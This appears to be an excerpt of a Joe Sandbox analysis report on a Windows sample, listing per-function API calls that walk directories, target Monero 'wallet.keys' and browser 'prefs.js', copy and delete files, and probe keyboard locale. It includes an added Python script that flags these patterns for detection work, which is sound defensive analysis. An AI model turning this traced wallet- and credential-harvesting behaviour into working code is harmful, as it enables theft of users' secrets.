                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: ad3dcd21eaa8ea1694c0447e3b3b1add25184fabb20e5f00e7de1cdafa765b08
                                • Instruction ID: 0c646c149b115b01b8d2c60514bf683c946b6667ea0d2befd84a8872ef9847b6
                                • Opcode Fuzzy Hash: ad3dcd21eaa8ea1694c0447e3b3b1add25184fabb20e5f00e7de1cdafa765b08
                                • Instruction Fuzzy Hash: 365185B6900218EBCB24FBB4DC85EEA73BCBB44700F4046D8B21992150EB759B85CFA1
                                APIs
                                • wsprintfA.USER32 ref: 00B7ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00B7ED55
                                • StrCmpCA.SHLWAPI(?,00B91538), ref: 00B7EDAB
                                • StrCmpCA.SHLWAPI(?,00B9153C), ref: 00B7EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00B7F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: c49cb329a46a2b94c28c71194fd6149c5fe2a3201fc13761fd0c838b1783b6bf
                                • Instruction ID: 55adf3739abd4981470ad6cb041e0cb4b707186845d5a416b19e8c535916c884
                                • Opcode Fuzzy Hash: c49cb329a46a2b94c28c71194fd6149c5fe2a3201fc13761fd0c838b1783b6bf
                                • Instruction Fuzzy Hash: E4E1DA719111189AFB54FB64DC51EEE73BCAF54300F4045EAB51A620A2EF346F8ACF62
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID:
                                • String ID: ''>$02ag$5y?$9L}$X6y$o8wW$o8wW$tW>-$v'l$vmtu$*V$gj
                                • API String ID: 0-1833511421
                                • Opcode ID: fecbab5a945ec1fc3d3f7031822095912b34a4c7e8b830584d48a2d783d367fb
                                • Instruction ID: 5e3717ab9e4d0066dabf4c57bb46506295bad6c92b7df161718017d1b59662bd
                                • Opcode Fuzzy Hash: fecbab5a945ec1fc3d3f7031822095912b34a4c7e8b830584d48a2d783d367fb
                                • Instruction Fuzzy Hash: BDB204F360C2049FE304AE29EC8567ABBE5EF94720F1A893DE6C4C7744E63598058796
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B915B8,00B90D96), ref: 00B7F71E
                                • StrCmpCA.SHLWAPI(?,00B915BC), ref: 00B7F76F
                                • StrCmpCA.SHLWAPI(?,00B915C0), ref: 00B7F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00B7FAC3
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: c75865191487f9b207a14101bd05d6a4149126158c699c57a906a35d2be206d2
                                • Instruction ID: bc675e185d3497c007e040ad65305c07b29556b8a02a63556544e7a795418f06
                                • Opcode Fuzzy Hash: c75865191487f9b207a14101bd05d6a4149126158c699c57a906a35d2be206d2
                                • Instruction Fuzzy Hash: 3CB153719001099BDB24FF64DC96AED73B9AF54300F4085E9E41E961A1EF346B49CFA2
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B9510C,?,?,?,00B951B4,?,?,00000000,?,00000000), ref: 00B71923
                                • StrCmpCA.SHLWAPI(?,00B9525C), ref: 00B71973
                                • StrCmpCA.SHLWAPI(?,00B95304), ref: 00B71989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B71D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00B71DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B71E20
                                • FindClose.KERNEL32(000000FF), ref: 00B71E32
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 4b8b67a89f7f2bf0ffe23f21b01e22d92d8700d086192c62e68c7165bfff5c98
                                • Instruction ID: f621a1d954af15584cf800175d8176120fe1e9878556973668b038b441cba570
                                • Opcode Fuzzy Hash: 4b8b67a89f7f2bf0ffe23f21b01e22d92d8700d086192c62e68c7165bfff5c98
                                • Instruction Fuzzy Hash: 6D12F5719101189BEB19FB64CC96EED73B8AF54300F4045EAB51A660A1EF346F89CFB1
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B90C2E), ref: 00B7DE5E
                                • StrCmpCA.SHLWAPI(?,00B914C8), ref: 00B7DEAE
                                • StrCmpCA.SHLWAPI(?,00B914CC), ref: 00B7DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00B7E3F2
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: a88de5c1bcc1108cb60ac49ddbff66d86b6b66cb806ebcd397b2e0fc3cdfb333
                                • Instruction ID: e0907c586bb8d8aa8676464a7b8b58f3e1162f2d4c276fd921f3d98318be1079
                                • Opcode Fuzzy Hash: a88de5c1bcc1108cb60ac49ddbff66d86b6b66cb806ebcd397b2e0fc3cdfb333
                                • Instruction Fuzzy Hash: A7F191718141189AEB15FB64DC95EEE73B8BF54300F8045EAA41A721B1EF346F4ACF62
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B914B0,00B90C2A), ref: 00B7DAEB
                                • StrCmpCA.SHLWAPI(?,00B914B4), ref: 00B7DB33
                                • StrCmpCA.SHLWAPI(?,00B914B8), ref: 00B7DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00B7DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00B7DDDE
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 0e493485faab38b13d33a8c28b24432b906b896073b9473f47545d4e11e8441b
                                • Instruction ID: 7b8dd4cd0d6d2eb9b2840f307ab6542d2bcfa87863adc0e3c9d17bc910306fae
                                • Opcode Fuzzy Hash: 0e493485faab38b13d33a8c28b24432b906b896073b9473f47545d4e11e8441b
                                • Instruction Fuzzy Hash: 149168769001049BDB14FF74DC569ED73BDAF84340F4086E9F91A96191EE38AB09CBA2
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID:
                                • String ID: (_V$+/$6Koe$BEAm$P0/s$S4{u$cE?$sj
                                • API String ID: 0-107983975
                                • Opcode ID: 4866d1e7b15de3bf5bb1bfc6344e993f0c0719e4bda48a69ca8c054e3c976351
                                • Instruction ID: 94bbafa858e1f41d6328ea9f7be2abb622813ec7323ed443207311887387ed24
                                • Opcode Fuzzy Hash: 4866d1e7b15de3bf5bb1bfc6344e993f0c0719e4bda48a69ca8c054e3c976351
                                • Instruction Fuzzy Hash: BEB228F360C2049FE308AE2DEC8567ABBE9EF94320F1A453DEAC5C3744E93558158697
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00B905AF), ref: 00B87BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00B87BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B87C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B87C62
                                • LocalFree.KERNEL32(00000000), ref: 00B87D22
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: fcf1f0cc08b5a7922046133124af5d1f43ac5df6a260b6a1c8b9e66329cdfc93
                                • Instruction ID: 97f60adbdffcbcc4c8846486d080b7df3f8c805d82f2fc1f82665afcf7127967
                                • Opcode Fuzzy Hash: fcf1f0cc08b5a7922046133124af5d1f43ac5df6a260b6a1c8b9e66329cdfc93
                                • Instruction Fuzzy Hash: 33415E71940218EBDB24EB94DC99BEDB3B4FF44704F2042D9E009A22A0DB346F85CFA1
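The function records above are Joe Sandbox's raw per-function call listings, and two call chains recur in them: the FindFirstFileA / StrCmpCA / StrCmpCA / FindNextFileA / FindClose walk driven by a "%s\*.*" or "\*.*" mask (the harvesting loop that reaches prefs.js and \Monero\wallet.keys, and in one function copies and deletes what it finds), and the GetKeyboardLayoutList / GetLocaleInfoA chain behind the "may stop execution after checking locale" signature. As an added example that is neither part of the report nor Joe Sandbox tooling, the Python below parses that listing format and flags those chains per function. The sample listing is excerpted from the records on this page with a few long argument lists shortened; the regex, the flag names, the thresholds (two StrCmpCA calls, two GetKeyboardLayoutList calls) and the assumption that the two StrCmpCA calls are the usual "." / ".." skip (the compared literals are not shown in the listing) are this example's own.

```python
import re
from typing import Dict, List, Optional, Set

# Sample listing excerpted from the function records above (three functions);
# some argument lists are shortened, nothing else is changed.
SAMPLE_LISTING = r"""
APIs
• wsprintfA.USER32 ref: 00B7ED3E
• FindFirstFileA.KERNEL32(?,?), ref: 00B7ED55
• StrCmpCA.SHLWAPI(?,00B91538), ref: 00B7EDAB
• StrCmpCA.SHLWAPI(?,00B9153C), ref: 00B7EDC1
• FindNextFileA.KERNEL32(000000FF,?), ref: 00B7F2AE
• FindClose.KERNEL32(000000FF), ref: 00B7F2C3
Similarity
• String ID: %s\*.*
APIs
  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B9510C), ref: 00B71923
• StrCmpCA.SHLWAPI(?,00B9525C), ref: 00B71973
• StrCmpCA.SHLWAPI(?,00B95304), ref: 00B71989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B71D40
• DeleteFileA.KERNEL32(00000000), ref: 00B71DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00B71E20
• FindClose.KERNEL32(000000FF), ref: 00B71E32
Similarity
• String ID: \*.*
APIs
• GetKeyboardLayoutList.USER32(00000000,00000000,00B905AF), ref: 00B87BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00B87BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00B87C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B87C62
• LocalFree.KERNEL32(00000000), ref: 00B87D22
Similarity
• String ID: /
"""

# One listing line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then Api.MODULE(args), ref: XXXXXXXX  (the args and the parentheses may be absent).
CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$")
STRING_RE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<val>.*)$")
LOCALE_SLANGUAGE = 0x2  # the LCType (second argument) seen in the GetLocaleInfoA call above


def _imm(s: str) -> Optional[int]:
    """Immediate argument as an int, or None for '?' and non-hex values such as paths."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_listing(text: str) -> List[Dict]:
    """Split at each 'APIs' heading; one dict per function with
    calls = [(api, args, ref, subcall-address-or-None), ...] and strings = the '$'-separated String ID."""
    records: List[Dict] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append({"calls": [], "strings": []})
            continue
        if not records:
            continue
        m = CALL_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") is not None else []
            records[-1]["calls"].append((m.group("api"), args, m.group("ref"), m.group("sub")))
            continue
        m = STRING_RE.match(line)
        if m:
            records[-1]["strings"] = [s for s in m.group("val").split("$") if s]
    return records


def direct_apis(rec: Dict) -> List[str]:
    """APIs called by the function itself, ignoring those attributed to its subcalls."""
    return [api for api, _, _, sub in rec["calls"] if sub is None]


def flags_for(rec: Dict) -> Set[str]:
    apis = direct_apis(rec)
    out: Set[str] = set()
    # Directory walk: FindFirstFileA ... FindNextFileA ... FindClose with at least two
    # StrCmpCA calls on the entry name in between (assumed to be the "." / ".." skip).
    if {"FindFirstFileA", "FindNextFileA", "FindClose"} <= set(apis):
        first, nxt = apis.index("FindFirstFileA"), apis.index("FindNextFileA")
        if apis[first:nxt].count("StrCmpCA") >= 2:
            out.add("directory_walk")
    if {"CopyFileA", "DeleteFileA"} & set(apis):
        out.add("copies_or_deletes_files")
    # Locale probe: GetKeyboardLayoutList twice (size query, then fill) and each layout
    # resolved with GetLocaleInfoA(LOCALE_SLANGUAGE).
    if apis.count("GetKeyboardLayoutList") >= 2 and any(
            api == "GetLocaleInfoA" and len(args) > 1 and _imm(args[1]) == LOCALE_SLANGUAGE
            for api, args, _, _ in rec["calls"]):
        out.add("keyboard_locale_probe")
    return out


def target_paths(rec: Dict) -> List[str]:
    """Path-like literals the function touches, from call arguments and the String ID."""
    found = {a for _, args, _, _ in rec["calls"] for a in args if "\\" in a}
    found |= {s for s in rec["strings"] if "\\" in s or "." in s}
    return sorted(found)


def analyze(text: str) -> List[Dict]:
    """Per-function summary: entry = lowest direct-call ref (the listing carries no function name)."""
    out = []
    for rec in parse_listing(text):
        refs = [ref for _, _, ref, sub in rec["calls"] if sub is None]
        out.append({"entry": min(refs) if refs else "?", "apis": direct_apis(rec),
                    "flags": flags_for(rec), "targets": target_paths(rec)})
    return out


if __name__ == "__main__":
    for r in analyze(SAMPLE_LISTING):
        print(r["entry"], sorted(r["flags"]), r["targets"])
```

Run over the complete function listing of a report, this yields one row per function with its entry ref, flags and literal targets, which is the material to pivot on when turning the report into a behavioural or YARA rule; the thresholds are choices made here, not values Joe Sandbox computes.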
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
